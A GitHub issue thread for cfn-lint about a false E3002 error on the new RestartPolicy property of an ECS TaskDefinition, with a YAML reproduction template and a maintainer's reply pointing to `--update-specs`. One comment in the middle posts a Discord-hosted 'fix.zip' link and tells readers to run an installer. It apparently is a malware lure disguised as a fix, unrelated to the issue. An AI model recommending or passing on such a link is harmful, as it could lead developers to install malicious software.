### ISSUE TITLE
v1.11.1: E3002: Additional properties are not allowed ('RestartPolicy' was unexpected)

### ISSUE THREAD

**Issue by r-heimann** [aws-cloudformation/cfn-lint#3642]
### CloudFormation Lint Version

1.11.1

### What operating system are you using?

Windows 11

### Describe the bug

`AWS::ECS::TaskDefinition` has a new parameter, but cfn-lint is unable to find it:

https://docs.aws.amazon.com/es_es/AWSCloudFormation/latest/UserGuide/aws-properties-ecs-taskdefinition-restartpolicy.html

### Expected behavior

cfn-lint is able to find the parameter. Maybe the schemas need to be updated?

### Reproduction template

```yaml
  ECSTaskDefinition:
    Type: AWS::ECS::TaskDefinition
    Properties:
      TaskRoleArn: !GetAtt ECSTaskIAMRole.Arn
      ExecutionRoleArn: !GetAtt ECSExecutionIAMRole.Arn
      NetworkMode: awsvpc
      RuntimePlatform:
        CpuArchitecture: ARM64
      Cpu: 1024
      Memory: 2048
      ContainerDefinitions:
        - Name: "Container"
          Image: <image>
          ReadonlyRootFilesystem: true
          RestartPolicy: # <---
            Enabled: true
          PortMappings:
            - ContainerPort: 443 # TCP
          LogConfiguration:
            LogDriver: awslogs
            Options:
              awslogs-region: !Ref AWS::Region
              awslogs-group: !Ref ECSLogGroup
              awslogs-stream-prefix: !Ref AWS::StackName
```

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by kddejong** [comment]
The next release will have it included.  https://github.com/aws-cloudformation/cfn-lint/pull/3624/files#diff-5f1e8f22eef194a0531e4a41aa3b694408aaf141b5d2f8703efa8b5fad9ff272R206

Our maintenance job https://github.com/aws-cloudformation/cfn-lint/actions/workflows/maintenance-v1.yaml will pick these up or you can run `cfn-lint --update-specs` to get the most recent version yourself.
